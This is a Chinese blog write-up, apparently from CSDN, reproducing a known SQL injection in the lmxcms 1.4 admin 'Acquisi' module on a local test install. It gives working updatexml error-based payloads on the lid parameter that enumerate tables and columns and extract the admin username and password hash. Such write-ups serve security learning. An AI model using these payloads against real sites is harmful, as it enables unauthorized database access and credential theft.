CNVD-1day代码审计&梦想CMS1.4&updatexml报错注入

已于 2023-01-07 10:51:00 修改
阅读量1.1k 收藏 6
点赞数 5
分类专栏: 基础的渗透测试 文章标签: web安全 Powered by 金山文档
于 2023-01-04 16:56:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/128550848
版权
1. 在玩CNVD漏洞复现利用的时候,看到了梦想CMS后台存在SQL注入,但是只知道BO、cl开头的文件,漏洞附件也不公开,尝试去挖一挖,锻炼一下挖洞思路。
2. 在梦想CMS官网下载了安装包,在本地进行测试(http://www.lmxcms.com/down/
3. 开始安装(这个就不详细说了)
4. 安装成功,开始玩耍
5. 代码审计
6. 在官网看到的这个CMS采用的是MVC模式,上网查它

经典MVC模式中,M是指模型,V是视图,C则是控制器,使用MVC的目的是将M和V的实现代码分离,从而使同一个程序可以使用不同的表现形式。其中,View的定义比较清晰,就是用户界面

7. 了解之后依然不明白,直接看URL找规律,最终明白了

前端的话对应的是index.php,m就是对应的模块功能只取Action前面的名字,a对应的就是模块里面的函数方法,classid对应的是函数里面的变量。

8. 直接代码审计
9. 漏洞还是很多的,随便来一个吧
10. 看到cid为get请求的变量,试试有没有SQL注入,结果数据库日志没有显示cid反而出现了lid
11. 开整lid吧

pyload:http://127.0.0.1/lmxcms1.4/admin.php?m=Acquisi&a=showCjData&lid=2 and 1=(updatexml(1,concat(0x3a,(select user())),1))

就这么简单??那就继续爆破数据库的名

12. 爆破数据库mx下的表名

and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='mx' limit 0,1)),0)#

注意:0x7e为sql加密的~符号,table_schema='mx' 这个名字是通过第一步查询到的数据库名,limit语法, limit 10,1,显示第0行的数据库名,每次输出一行

通过修改limit的值,可以遍历数据库中的表名

感觉比较重要的表名mx_ad,mx_book,mx_user

13. 爆破数据表mx_ad下的字段名

and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='mx_ad' and table_schema='mx'limit 0,1)),0)#

未发现敏感数据

14. 爆破数据表mx_user下的字段名

and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='mx_user' and table_schema='mx'limit 0,1)),0)#

name和pwd都出来了

15. 爆破数据表mx_user下的字段中的值

and 1=(updatexml(1,concat(0x3a,(select name from mx_user)),1))

127.0.0.1/lmxcms1.4/admin.php?m=Acquisi&a=showCjData&lid=2 and 1=(updatexml(1,concat(0x3a,(select pwd from mx_user)),1))

updatexml函数最多输出32个字节。这个时候md5解密是解不出来的,因为~的存在占据一位,密文只有31位,所以substring函数作用就出来了。

and 1=(updatexml(1,concat(0x7e,substring((select pwd from mx_user),1,32)),1))

substring函数:返回第一个参数中从第二个参数指定的位置开始、第三个参数指定的长度的字符串。例如:substring(“123456”,2,3)返回234,意思就是从第二个开始,输入3位

通过爆破 name=admin pwd=25f4696b213d14bc35eb70b4724c388d

25f4696b213d14bc35eb70b4724c388d安装的时候有秘钥,所以无法解密

大飞先生
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
代码审计 | 这个CNVD证书拿的有点轻松
hackzkaq的博客
04-13 1954
这个CNVD证书拿的有点轻松
盘企LCMS代码审计CNVD-2021-28469』1
08-03
盘企LCMS代码审计CNVD-2021-28469』1
漏洞挖掘分析_审计挖掘之CNVD通用漏洞_手把手教白客记录贴
最新发布
程序员三九的博客
05-14 937
前言本次内容对cnvd通用漏洞库中的进行一个代码审计漏洞复现,对cnvd漏洞库里的几处漏洞进行复现挖掘,发现几处新的漏洞点。本次实验为靶机环境。本次内容仅用于学习和研究
梦想cms1.4代码审计
m0_60716947的博客
01-07 1867
php代码审计梦想cms
代码审计之_lmxcms1.4漏洞
whojoe的博客
04-12 3194
lmxcms1.4代码审计漏洞复现lmxcms1.4代码审计漏洞复现1.存在漏洞2.漏洞利用2.1.前台sql注入2.2后台任意文件删除2.3后台任意文件上传3.漏洞分析3.1前台sql注入3.2后台任意文件删除4.利用链 lmxcms1.4代码审计漏洞复现 1.存在漏洞 前台sql注入,后台任意文件删除,任意文件上传 2.漏洞利用 2.1.前台sql注入 GET http://192.16...
梦想CMS注入漏洞分析&发现小彩蛋
weixin_42508548的博客
11-24 2659
查资料的时候,偶然间看到这样一个漏洞,在一个提交表单的地方,插入SQL语句,便可以进行报错注入。看着有点像二次注入,对于这样类型的注入,我个人遇到的还是比较少的,再加上一般这种地方多数会尝试XSS,所以进行了分析,看看漏洞到底是如何产生的。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、下载cms源码 cms下载地址:http://www.lmxcms.com/file/d/down/xitong/20210
代码审计-PHP项目&MVC注入&CNVD1day&SQL监控&动态调试
siu~
09-25 385
1、审计漏洞-SQL数据库注入挖掘 1、审计思路-正则搜索&功能追踪&辅助工具 3、审计类型-常规架构&MVC架构&三方框架
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
梦想cms(lmxcms)v1.4 网站系统.zip
07-06
lmxcms1.4更新内容包括: 增加功能: 增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能 增加上传图片生成缩略图可以根据宽度自动缩放高度比例 增加tags可以绑定栏目 增加随机信息调用标签 randdata 使用方法看手册 增加随机调用tags标签 randtags 使用方法看手册 后台去除嵌入广告 修复功能: 数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复) 搜索时间间隔参数无效的bug 修复执行sql语句由于表前缀导致的错误 相关链接标签链接有误的bug lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms1.4主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 采集系统:支持图片远程保存,图片的各种处理等。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。        相关阅读 同类推荐:lmxcms后台密码找回插件 企业网站源码
梦想cms(lmxcms)网站管理系统 v1.3
04-04
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。 lmxcms v1.3 更新日志: lmxcms1.3增加功能: 加入专题功能 加入tags标签功能 静态模式下可以使用中文路径(服务器或者空间必须支持中文文件夹),否则为拼音模式,可以在 config.inc.php中设置路径模式 加入伪静态访问模式 加入栏目绑定域名功能 需要配合域名解析 加入后台登录密码错误次数限制 加入控制后台操作日志开关 /inc/config.inc.php 参数控制 增加设置内容信息关键字和关键字链接 增加提取正文为描述信息 增加提取标题或正文为关键字 修改内容信息页面布局 lmxcms1.3修复: 修复图片上传、水印错误 修复删除图片、文件不删除本地文件的错误 修复数据库备份因数据量过大导致内存溢出错误,优化数据库备份、恢复、下载功能
梦想cms(lmxcms)网站管理系统 v1.4
10-24
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。lmxcms1.4主要包括以下功能:自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。友情链接:支持文字和图片形式的友情链接。广告系统:后台支持文字、图片、html三种形式的广告系统。在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。模板管理:后台支持自定义切换模板风
梦想cms(lmxcms)网站管理系统 v1.4.rar
08-30
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms1.4主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 **志操作:后台的每一个操作都会记录到**志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 采集系统:支持图片远程保存,图片的各种处理等。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。 lmxcms1.4更新内容包括: 增加功能: 增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能 增加上传图片生成缩略图可以根据宽度自动缩放高度比例 增加tags可以绑定栏目 增加随机信息调用标签 randdata 使用方法看手册 增加随机调用tags标签 randtags 使用方法看手册 后台去除嵌入广告 修复功能: 数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复) 搜索时间间隔参数无效的bug 修复执行sql语句由于表前缀导致的错误 相关链接标签链接有误的bug
梦想cms(lmxcms) 1.4.rar
05-25
梦想cms(lmxcms)使用php语言和mysql数据库开发,并且采用了主流的MVC设计模式,使系统框架结构清晰、易维护、模块化、扩展性更好,而且系统中内置smarty模 板引擎,模板标签扩展更加自由。 梦想cms(lmxcms) 1.4 升级日志: 更新功能包括:增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能增加上传图片生成缩略图可以根据宽度自动缩放高度比例增加tags可以绑定栏目增加随机信息调用标签 randdata 使用方法看手册增加随机调用tags标签 randtags 使用方法看手册后台去除嵌入广告修复bug:数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复)搜索时间间隔参数无效的bug修复执行sql语句由于表前缀导致的错误相关链接标签链接有误的bug
Day107:代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
qq_61553520的博客
04-07 1257
小迪安全-Day107:代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
梦想家内容管理系统(Dreamer CMS)跨站请求伪造漏洞
白昼小丑的博客
01-07 641
通过组件/admin/database/backup发现包含跨站点请求伪造(CSRF)梦想家内容管理系统(Dreamer CMS)跨站请求伪造漏洞
lmxcms1.4 代码审计分析复现
qq_45764684的博客
05-31 499
lmxcms1.4

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值